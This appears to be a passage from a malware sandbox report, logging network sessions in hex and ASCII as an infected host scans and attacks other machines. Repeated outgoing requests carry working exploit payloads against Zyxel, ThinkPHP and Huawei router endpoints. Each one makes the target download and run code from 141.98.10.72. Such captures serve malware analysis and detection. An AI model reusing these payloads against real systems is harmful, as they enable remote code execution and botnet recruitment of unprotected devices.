                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            694192.168.2.234197894.123.100.388080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.131831884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            695192.168.2.233907294.121.56.178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.132122993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            696192.168.2.235929888.99.125.24480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.528327942 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:32.734755993 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:32 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                            Feb 14, 2024 09:29:32.734770060 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                            Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                            Feb 14, 2024 09:29:32.734781981 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                            Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                            Feb 14, 2024 09:29:32.734796047 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                            Feb 14, 2024 09:29:32.734810114 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                            Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                            Feb 14, 2024 09:29:32.734824896 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                            Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                            Feb 14, 2024 09:29:32.734838009 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                            Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                            Feb 14, 2024 09:29:32.735064983 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to server.timlogsolutions.com's <a href="mailto:serve
                                                            Feb 14, 2024 09:29:32.735079050 CET357INData Raw: 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c
                                                            Data Ascii: plogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            697192.168.2.233959895.100.228.19080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.743922949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:32.960562944 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:32 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:32 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 33 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 32 26 23 34 36 3b 33 35 37 34 65 65 63 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;537e19b8&#46;1707899372&#46;3574eec0</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            698192.168.2.233334295.100.118.11580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.948024035 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:33.162715912 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:29:33 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:33 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 33 26 23 34 36 3b 65 37 33 66 39 38 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3d8e2117&#46;1707899373&#46;e73f985</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            699192.168.2.235283295.173.164.5180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.984839916 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:33.253561020 CET932INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Wed, 14 Feb 2024 08:21:08 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            700192.168.2.2352504197.246.141.1737215
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:33.287791014 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Feb 14, 2024 09:29:33.588475943 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            701192.168.2.233409485.10.90.1438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.003628016 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            702192.168.2.233408094.27.229.1598080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:34.245779037 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.478209019 CET412INHTTP/1.1 404 Not Found
